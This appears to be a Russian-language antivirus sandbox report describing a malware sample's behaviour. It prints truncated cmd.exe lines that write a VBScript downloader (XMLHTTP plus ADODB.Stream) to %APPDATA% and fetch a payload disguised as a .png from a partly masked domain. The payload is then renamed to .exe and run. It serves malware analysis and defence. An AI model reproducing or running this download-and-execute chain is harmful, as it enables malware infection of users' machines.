Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> eg8.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> eg8.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> eg8.vbs &echo drgfgd.Open ...
- '<SYSTEM32>\cmd.exe' /c echo 4251 & ping localhost & cd "%appdata%" & echo drgfgd.Send>> eg8.vbs &echo With jhgfsf>> eg8.vbs &echo .Type = ^1>> eg8.vbs &echo .Open>> eg8.vbs & echo .write drgfgd.responseb...
Изменения в файловой системе
Создает следующие файлы
- <Текущая директория>\oo.txt
- %APPDATA%\eg8.vbs
- %APPDATA%\kwyn.png
Удаляет следующие файлы
- %APPDATA%\eg8.vbs
Перемещает следующие файлы
- %APPDATA%\kwyn.png в %APPDATA%\kwyn.exe
Сетевая активность
Подключается к
- 'di##.#arelia.pro':80
TCP
Запросы HTTP GET
- http://di##.#arelia.pro/sR3o2Jq/750.png
UDP
- DNS ASK di##.#arelia.pro
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\eg8.vbs"
- '<SYSTEM32>\cmd.exe' /c echo 4251 & ping localhost & cd "%appdata%" & echo drgfgd.Send>> eg8.vbs &echo With jhgfsf>> eg8.vbs &echo .Type = ^1>> eg8.vbs &echo .Open>> eg8.vbs & echo .write drgfgd.responseb...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c cd "%appdata%" &echo Dim drgfgd, jhgfsf >> eg8.vbs &echo Set drgfgd = CreateObject("Microsoft.XMLHTTP")>> eg8.vbs &echo Set jhgfsf = CreateObject("Adodb.Stream")>> eg8.vbs &echo drgfgd.Open ...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\ping.exe' localhost
- '<SYSTEM32>\ping.exe' localhost -n 5
